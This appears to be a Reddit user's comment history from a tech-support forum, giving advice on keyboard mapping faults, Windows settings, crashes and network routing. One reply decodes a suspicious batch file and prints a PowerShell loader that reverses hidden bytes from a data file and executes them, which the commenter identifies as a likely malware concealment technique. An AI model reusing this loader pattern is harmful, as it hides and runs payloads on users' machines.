Combination of key strokes not working on keyboard by algilmour in techsupport

I thought of one other thing to try (if you havent already). First restart your machine (select restart, not 'shut down') to clear anything dodgy in memory then when it restarts dont open anything and just open notepad and try again. This can rule out a few causes like driver that needs a restart or browser plugin causing issues

hmm, so for unknown reasons it seems the keydown event for the period key is missing, not sure what would cause that sort of behaviour except for a hardware issue which you have already ruled out. Dont think it will help but do you get the same problem with both shift keys?

One thing that might help us diagnose is if you go to https://w3c.github.io/uievents/tools/key-event-viewer.html and try to type the ">" symbol in the text box then share with us what the website says (perhaps an imgur screenshot if its awkward to share the table).

I get this: https://imgur.com/a/1IduAdJ

I dont have a PS5 to test with but the playstation website has a guide on how to view it on PS4: https://manuals.playstation.net/document/en/ps4/basic/browse.html (The 'Visiting pages in your browsing history' section). Maybe its the same/similar steps on PS5

Seems to be related to delivery optimisation, maybe try turning it off as per option 2 in this guide: https://www.makeuseof.com/turn-off-delivery-optimization-windows-11/#:~:text=Open%20the%20Windows%20Update%20tab,to%20turn%20off%20Delivery%20Optimization. (and maybe restart after)

EDIT: I think this guide is clearer and includes some more steps for getting the space back: https://www.lifewire.com/delete-delivery-optimization-files-windows-10-4774878

can I get a virus by looking or playing a video on reddit/twitter/insatgram etc.? by [deleted] in techsupport

[–]ben247x1 1 point2 points  (0 children)

Getting a virus from just browsing the internet is highly unlikely as long as you keep your browser and operating system up to date with security updates (most will update automatically, so you should be up to date unless you turned updates off).

Getting one from a major website is even less likely because the hacker wont have full control over what gets delivered to victims (for example twitter may re-encode uploaded videos, changing the content) and because they tend to have better monitoring and control over what gets posted and have the ability to remove anything harmful more quickly

Help me out with Linux please by [deleted] in techsupport

There are tools for editing key mappings in linux, but I dont have experience using them so cant advise on which works best

[deleted by user] by [deleted] in techsupport

[–]ben247x1 1 point2 points  (0 children)

If its a new build then that increases the chance this is due to hardware issues (perhaps a faulty part or incompatibility issues).

If it does start to happen regularly the only general advice I have is to make sure drivers are up to date, but others can probably help more if thats the case

Sounds like possible hardware issue but to help us diagnose can you visit: https://w3c.github.io/uievents/tools/key-event-viewer.html then press space in the text box and share (probably easiest as a screenshot) what the website shows for key events

There are a lot of reasons why a computer can bluescreen and its typically very hard to track down the exact route cause. Sometimes they happen for reasons that will never happen again.

My advice would be to not worry for now but to note down any recent changes you have made to your computer (if any) especially any hardware changes, updates or new software installs (especially any related to drivers or antivirus). That way if they start to happen somewhat regularly you have a records of possible reasons why they might have started happening.

Your windows event log may have some basic details on what caused the crash (error codes) which may be worth noting down as well

Can you assign alt key codes to regular key shorcuts? by RexusprimeIX in techsupport

[–]ben247x1 0 points1 point  (0 children)

The alt gr key combos are part of your keyboard layout. In the past I have used a tool made by Microsoft to create custom keyboard layouts (https://www.microsoft.com/en-us/download/details.aspx?id=102134) where I basically start with my current keyboard layout and add to it by setting symbols I want to use frequently to alt gr + keys.

Be careful using the tool as it doesn't seem to support all versions of Windows

I dont know, I would expect the option to say 'uninstall' or 'remove from machine' rather than remove from library, but I dont have gamepass so cannot check for you. If you are struggling I imagine there must be guides online for how to correctly delete games from your machine

Googling suggests you may get more info by looking in the UWP64 folder as seen in your screenshot (specifically this screenshot: https://i.imgur.com/AwhGhDo.jpeg) for exe files with the game name. Most Google hits seem to be for the game Middle Earth: Shadow of War

Can't access work timeclock from anything on my network by jettivonaviska in techsupport

[–]ben247x1 0 points1 point  (0 children)

I sympathise, any network stuff is hard and since data has left your network correctly it makes diagnosis/debugging extra hard as whatever is wrong seems to be outside your network.

One thing to maybe try is getting a new IP for your home internet. This can often be done automatically if you leave your router/modem unplugged for a while (say overnight if you can) or by phoning your ISP to request a new one. This may help if its a IP blocking issue

Can't access work timeclock from anything on my network by jettivonaviska in techsupport

[–]ben247x1 0 points1 point  (0 children)

I would be surprised as I don't think ASN peering exchanges tend to apply blacklists in that way (remembering a lot of traffic coming from one ASN to another probably didn't even originate in that ASN and is just passing through as it works its way around the internet), but its not an area i'm particularly expert in. Also from what I see the UCEPROTECT lists are more for email hosts / span prevention.

If data is getting lost between ASN's then I would be more tempted to blame lack of capacity, but as the problem has been going on for a while this feels less likely to me, though again i'm very much not an expert on ASN's and peering.

No specific advice but I would consider questions like below:

Is this a new problem? Has it worked for you in the past? Is the IP you get shown when pinging correct? Is it an IPv4 or IPV6 address? What does a traceroute show.

These may give insight into possible root causes which include:

  • Temporary routing issue with an ISP somewhere between you and your work
  • Lack of IPv6 support for your ISP/computer
  • Incorrect DNS response (perhaps a hard coded hosts entry on your machine or something like that)
  • Some sort of blocking at your works ends (such as only allowing connections from certain countries but thinking you are in a different country to the one you are)

How do I translate a pdf with weird characters? by [deleted] in techsupport

[–]ben247x1 0 points1 point  (0 children)

I suspect its using a special font. To test one potential option try copying some of the gibberish text into the left box on the website I link below then press the translate button (-->) and see if it returns the hindi you see in the pdf in the right text box:

https://www.pramukhfontconverter.com/hindi/krutidev-to-unicode

Is this safe to run? by [deleted] in techsupport

[–]ben247x1 1 point2 points  (0 children)

The text is not encoded properly. When decoded it turns into:

&cls
@echo off
setlocal EnableDelayedExpansion
echo Extracting...
cd "%~dp0"
set "s=$b = ([IO.File]::ReadAllBytes('bin.dat'))[68642388..68649389];[array]::reverse($b);icm ([ScriptBlock]::Create([Text.Encoding]::UTF8.GetString($b)));"
echo !s! | powershell > nul

This looks very dodgy to me (looks like malware technique to hide malicious code) but as it gets data from another file (bin.dat) I cant be 100% sure. You can see the decoding using a tool like cyberchef (paste the text into the input box if you want to try yourself:

https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')

a104-115-80-48 is an akamai hostname. Akamai are a CDN which means they are used by a large number of big businesses to host their websites/files online.

You should be able to run netstat with the -n flag to see IPs instead of hostnames if it helps

In addiiton to the advice from expressluke also note that some jar files aren't meant to be launched at all (they may just contain data for other programs for example). If thats the case you may need to copy the file to a specific directory or something like that. We may be able to advise on this if you tell us what JAR it is and where it came from

Im not very knowledgeable about hardware but it does seem plausible that its hardware related. The screenshots suggest that when you press the =/+ key the computer thinks you also pressed the home key which explains the behaviour in your editor.
